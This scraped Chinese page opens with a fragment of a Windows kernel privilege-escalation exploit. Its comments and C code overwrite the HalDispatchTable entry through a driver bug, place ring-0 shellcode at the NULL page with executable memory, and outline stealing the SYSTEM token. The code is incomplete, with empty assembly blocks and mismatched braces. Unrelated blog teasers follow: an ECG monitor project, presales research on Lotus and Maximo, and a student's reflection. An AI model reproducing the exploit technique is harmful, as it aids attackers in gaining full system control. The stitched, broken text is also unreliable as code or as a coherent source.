/*
shell執行思路:
一般會運用某個驅動的bug,使得ring3傳入的位址指向的**會被執行
比如:乙個驅動會將傳入的位址的內容清0,那麼可以將shellcode拷貝到0x00位址處,然後觸發shellcode
在ring3獲取haldispatchtable表的位址x,x+4即存有函式halquerysysteminformation的位址,則利用bug將此處修改為0,即可觸發shellcode
*/ulong uattr;
ntstatus myshellcode(/*此處是原函式的引數*/)
//提權到system
_asm
//修改當前程序的token
//開啟核心保護
_asm
return 0;}/*
在0x0處申請一段記憶體,並寫入ring0 shellcode
*/shellcodeaddress=(pvoid)sizeof(ulong);
status=zwallocatevirtualmemory(ntcurrentprocess(),&shellcodeaddress,0,mem_reserve|mem_commit|mem_top_down,page_execute_readwrite);
if(status)
return;
rtlmovememory(shellcodeaddress,(pvoid)myshellcode,shellcodesize);
重要的一段
2006 6 23 22 44 00 重要的一段 這幾個月都用在開發心電監護系統上了,終於告一段落,倍感輕鬆。欣慰的是,有了成果,並且成果正走在產品化路上。5月31日,孕育 設計監護儀樣機結構和pcb 6月7日,生日 pcb板製好,開始焊接和除錯 6月17日,tata,監護儀終於可以見人了。介紹一下...
忙碌的一段日子
最近不是一般的忙,在做lotus foundations 的售前資料,和maximo的售前產品研究。乙個是新推出的產品系列,乙個是未曾接觸過的高階資產管理軟體,maximo雖然被ibm收購,但技術尚未接管,這是個很大的麻煩,所以,我幾乎沒有什麼資料可查。都是從網上找來各種各樣的文章,資料,自己研究,...
一段新的旅程
不知道這麼多年天我是怎樣走過來的,似乎什麼都不知道,什麼都不清楚,就這樣一路撞到了今天。自從到了大學我以為我變了我更加開朗了更加活潑了和以前完全不一樣了變得越來越好了。可是,不過是以為而已。慢慢放下了筆,未竟的 再也沒有看下去。拿起了手機,未讀的書在手邊很少有興趣去翻閱。開啟了英雄聯盟,對著未完成 ...